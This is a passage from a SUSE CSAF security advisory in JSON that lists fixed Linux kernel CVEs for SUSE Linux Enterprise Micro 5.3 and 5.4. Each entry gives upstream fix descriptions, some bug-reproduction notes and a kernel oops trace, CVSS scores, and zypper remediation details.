mechanism, it manifested after hours on my test\nmachine. The key to make it happen is having zswap writebacks, so\nwhatever setup pumps /sys/kernel/debug/zswap/written_back_pages should do\nthe trick.\n\nIn order to reproduce this faster on a vm, I setup a system with ~100M of\navailable memory and a 500M swap file, then running `stress --vm 1\n--vm-bytes 300000000 --vm-stride 4000` makes it happen in matter of tens\nof minutes. One can speed things up even more by swinging\n/sys/module/zswap/parameters/max_pool_percent up and down between, say, 20\nand 1; this makes it reproduce in tens of seconds. It\u0027s crucial to set\n`--vm-stride` to something other than 4096 otherwise `stress` won\u0027t\nrealize that memory has been corrupted because all pages would have the\nsame data.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53178",
"url": "https://www.suse.com/security/cve/CVE-2023-53178"
},
{
"category": "external",
"summary": "SUSE Bug 1249827 for CVE-2023-53178",
"url": "https://bugzilla.suse.com/1249827"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2023-53178"
},
{
"cve": "CVE-2023-53407",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53407"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nUSB: gadget: pxa27x_udc: fix memory leak with using debugfs_lookup()\n\nWhen calling debugfs_lookup() the result must have dput() called on it,\notherwise the memory will leak over time. To make things simpler, just\ncall debugfs_lookup_and_remove() instead which handles all of the logic\nat once.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53407",
"url": "https://www.suse.com/security/cve/CVE-2023-53407"
},
{
"category": "external",
"summary": "SUSE Bug 1253028 for CVE-2023-53407",
"url": "https://bugzilla.suse.com/1253028"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2023-53407"
},
{
"cve": "CVE-2023-53412",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53412"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nUSB: gadget: bcm63xx_udc: fix memory leak with using debugfs_lookup()\n\nWhen calling debugfs_lookup() the result must have dput() called on it,\notherwise the memory will leak over time. To make things simpler, just\ncall debugfs_lookup_and_remove() instead which handles all of the logic\nat once.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53412",
"url": "https://www.suse.com/security/cve/CVE-2023-53412"
},
{
"category": "external",
"summary": "SUSE Bug 1254462 for CVE-2023-53412",
"url": "https://bugzilla.suse.com/1254462"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2023-53412"
},
{
"cve": "CVE-2023-53417",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53417"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nUSB: sl811: fix memory leak with using debugfs_lookup()\n\nWhen calling debugfs_lookup() the result must have dput() called on it,\notherwise the memory will leak over time. To make things simpler, just\ncall debugfs_lookup_and_remove() instead which handles all of the logic\nat once.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53417",
"url": "https://www.suse.com/security/cve/CVE-2023-53417"
},
{
"category": "external",
"summary": "SUSE Bug 1254463 for CVE-2023-53417",
"url": "https://bugzilla.suse.com/1254463"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2023-53417"
},
{
"cve": "CVE-2023-53418",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53418"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nUSB: gadget: lpc32xx_udc: fix memory leak with using debugfs_lookup()\n\nWhen calling debugfs_lookup() the result must have dput() called on it,\notherwise the memory will leak over time. To make things simpler, just\ncall debugfs_lookup_and_remove() instead which handles all of the logic\nat once.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53418",
"url": "https://www.suse.com/security/cve/CVE-2023-53418"
},
{
"category": "external",
"summary": "SUSE Bug 1254464 for CVE-2023-53418",
"url": "https://bugzilla.suse.com/1254464"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2023-53418"
},
{
"cve": "CVE-2024-26581",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-26581"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_set_rbtree: skip end interval element from gc\n\nrbtree lazy gc on insert might collect an end interval element that has\nbeen just added in this transactions, skip end interval elements that\nare not yet active.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-26581",
"url": "https://www.suse.com/security/cve/CVE-2024-26581"
},
{
"category": "external",
"summary": "SUSE Bug 1220144 for CVE-2024-26581",
"url": "https://bugzilla.suse.com/1220144"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2024-26581"
},
{
"cve": "CVE-2024-26832",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-26832"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm: zswap: fix missing folio cleanup in writeback race path\n\nIn zswap_writeback_entry(), after we get a folio from\n__read_swap_cache_async(), we grab the tree lock again to check that the\nswap entry was not invalidated and recycled. If it was, we delete the\nfolio we just added to the swap cache and exit.\n\nHowever, __read_swap_cache_async() returns the folio locked when it is\nnewly allocated, which is always true for this path, and the folio is\nref\u0027d. Make sure to unlock and put the folio before returning.\n\nThis was discovered by code inspection, probably because this path handles\na race condition that should not happen often, and the bug would not crash\nthe system, it will only strand the folio indefinitely.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-26832",
"url": "https://www.suse.com/security/cve/CVE-2024-26832"
},
{
"category": "external",
"summary": "SUSE Bug 1223007 for CVE-2024-26832",
"url": "https://bugzilla.suse.com/1223007"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2024-26832"
},
{
"cve": "CVE-2024-46854",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-46854"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: dpaa: Pad packets to ETH_ZLEN\n\nWhen sending packets under 60 bytes, up to three bytes of the buffer\nfollowing the data may be leaked. Avoid this by extending all packets to\nETH_ZLEN, ensuring nothing is leaked in the padding. This bug can be\nreproduced by running\n\n\t$ ping -s 11 destination",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-46854",
"url": "https://www.suse.com/security/cve/CVE-2024-46854"
},
{
"category": "external",
"summary": "SUSE Bug 1231084 for CVE-2024-46854",
"url": "https://bugzilla.suse.com/1231084"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2024-46854"
},
{
"cve": "CVE-2024-50143",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-50143"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nudf: fix uninit-value use in udf_get_fileshortad\n\nCheck for overflow when computing alen in udf_current_aext to mitigate\nlater uninit-value use in udf_get_fileshortad KMSAN bug[1].\nAfter applying the patch reproducer did not trigger any issue[2].\n\n[1] https://syzkaller.appspot.com/bug?extid=8901c4560b7ab5c2f9df\n[2] https://syzkaller.appspot.com/x/log.txt?x=10242227980000",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-50143",
"url": "https://www.suse.com/security/cve/CVE-2024-50143"
},
{
"category": "external",
"summary": "SUSE Bug 1233038 for CVE-2024-50143",
"url": "https://bugzilla.suse.com/1233038"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2024-50143"
},
{
"cve": "CVE-2024-54031",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-54031"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_set_hash: unaligned atomic read on struct nft_set_ext\n\nAccess to genmask field in struct nft_set_ext results in unaligned\natomic read:\n\n[ 72.130109] Unable to handle kernel paging request at virtual address ffff0000c2bb708c\n[ 72.131036] Mem abort info:\n[ 72.131213] ESR = 0x0000000096000021\n[ 72.131446] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 72.132209] SET = 0, FnV = 0\n[ 72.133216] EA = 0, S1PTW = 0\n[ 72.134080] FSC = 0x21: alignment fault\n[ 72.135593] Data abort info:\n[ 72.137194] ISV = 0, ISS = 0x00000021, ISS2 = 0x00000000\n[ 72.142351] CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n[ 72.145989] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n[ 72.150115] swapper pgtable: 4k pages, 48-bit VAs, pgdp=0000000237d27000\n[ 72.154893] [ffff0000c2bb708c] pgd=0000000000000000, p4d=180000023ffff403, pud=180000023f84b403, pmd=180000023f835403,\n+pte=0068000102bb7707\n[ 72.163021] Internal error: Oops: 0000000096000021 [#1] SMP\n[...]\n[ 72.170041] CPU: 7 UID: 0 PID: 54 Comm: kworker/7:0 Tainted: G E 6.13.0-rc3+ #2\n[ 72.170509] Tainted: [E]=UNSIGNED_MODULE\n[ 72.170720] Hardware name: QEMU QEMU Virtual Machine, BIOS edk2-stable202302-for-qemu 03/01/2023\n[ 72.171192] Workqueue: events_power_efficient nft_rhash_gc [nf_tables]\n[ 72.171552] pstate: 21400005 (nzCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)\n[ 72.171915] pc : nft_rhash_gc+0x200/0x2d8 [nf_tables]\n[ 72.172166] lr : nft_rhash_gc+0x128/0x2d8 [nf_tables]\n[ 72.172546] sp : ffff800081f2bce0\n[ 72.172724] x29: ffff800081f2bd40 x28: ffff0000c2bb708c x27: 0000000000000038\n[ 72.173078] x26: ffff0000c6780ef0 x25: ffff0000c643df00 x24: ffff0000c6778f78\n[ 72.173431] x23: 000000000000001a x22: ffff0000c4b1f000 x21: ffff0000c6780f78\n[ 72.173782] x20: ffff0000c2bb70dc x19: ffff0000c2bb7080 x18: 0000000000000000\n[ 72.174135] x17: ffff0000c0a4e1c0 x16: 0000000000003000 x15: 0000ac26d173b978\n[ 72.174485] x14: ffffffffffffffff x13: 0000000000000030 x12: ffff0000c6780ef0\n[ 72.174841] x11: 0000000000000000 x10: ffff800081f2bcf8 x9 : ffff0000c3000000\n[ 72.175193] x8 : 00000000000004be x7 : 0000000000000000 x6 : 0000000000000000\n[ 72.175544] x5 : 0000000000000040 x4 : ffff0000c3000010 x3 : 0000000000000000\n[ 72.175871] x2 : 0000000000003a98 x1 : ffff0000c2bb708c x0 : 0000000000000004\n[ 72.176207] Call trace:\n[ 72.176316] nft_rhash_gc+0x200/0x2d8 [nf_tables] (P)\n[ 72.176653] process_one_work+0x178/0x3d0\n[ 72.176831] worker_thread+0x200/0x3f0\n[ 72.176995] kthread+0xe8/0xf8\n[ 72.177130] ret_from_fork+0x10/0x20\n[ 72.177289] Code: 54fff984 d503201f d2800080 91003261 (f820303f)\n[ 72.177557] ---[ end trace 0000000000000000 ]---\n\nAlign struct nft_set_ext to word size to address this and\ndocumentation it.\n\npahole reports that this increases the size of elements for rhash and\npipapo in 8 bytes on x86_64.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-54031",
"url": "https://www.suse.com/security/cve/CVE-2024-54031"
},
{
"category": "external",
"summary": "SUSE Bug 1235905 for CVE-2024-54031",
"url": "https://bugzilla.suse.com/1235905"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2024-54031"
},
{
"cve": "CVE-2025-21658",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21658"
}
],
"notes": [
{
"category": "general",
